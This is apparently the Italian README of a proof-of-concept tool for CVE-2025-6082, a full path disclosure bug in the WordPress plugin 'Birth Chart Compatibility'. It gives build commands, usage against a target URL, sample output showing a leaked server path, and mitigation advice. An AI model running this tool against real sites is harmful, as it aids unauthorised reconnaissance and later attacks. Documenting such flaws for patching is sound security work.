
Proof‑of‑Concept sfrutta il bug di Full Path Disclosure nel plugin WordPress “Birth Chart Compatibility” (<=v2.0)
Autore: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
Vulnerabilità: Full Path Disclosure (CWE-200)
Questa Proof‑of‑Concept sfrutta un bug di Full Path Disclosure nel plugin WordPress Birth Chart Compatibility (versioni ≤ 2.0). Il POC invia una richiesta HTTP GET all’endpoint index.php del plugin, cattura eventuali avvisi o errori fatali PHP e analizza il percorso del filesystem del server (ad esempio /var/www/html/wp-content/plugins/... o C:\xampp\htdocs\...).
Rivelare il percorso completo aiuta un attaccante a concatenare ulteriori attacchi di Inclusioni di File Locali (LFI), Esecuzione di Codice Remoto (RCE) o altre attività di ricognizione.
gcc o compilatore C compatibilelibcurlargparse.c / argparse.hgcc -o fpd-poc exploit.c argparse.c -lcurl
./fpd-poc -u https://target.com [options]
Opzioni:
-u, --url (Obbligatorio) URL di base del sito WordPress di destinazione
-c, --cookies Usa i cookie dal FILE (opzionale)
-v, --verbose Abilita output verbose di curl
-f, --loop Ripeti la richiesta N volte (es. -f 10)
-h, --help Mostra questo messaggio di aiuto
Esempio:
./fpd-poc -u https://victim.com
./fpd-poc -u https://victim.com -v -f 5
Esempio di output:
[+] Richiesta inviata con successo
[+] URL di input : https://victim.com
[+] URL in formato completo: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php
[+] Codice HTTP : 200
====================================[Risposta]====================================
Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...
[+] Lunghezza risposta : 256
[+] Parola chiave trovata: Warning:
[+] Contesto: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php
Aggiorna il plugin “Birth Chart Compatibility” a una versione corretta (> 2.0) non appena rilasciata.
Disabilita o rimuovi il plugin se non lo usi.
Nega l'accesso diretto ai file PHP del plugin (index.php) tramite la configurazione del tuo server web (ad esempio tramite regole .htaccess o Nginx).
Disclaimer Questo codice è fornito solo a scopo educativo e di test. L'uso non autorizzato su sistemi di cui non si possiede o non si ha esplicito permesso di test potrebbe essere illegale.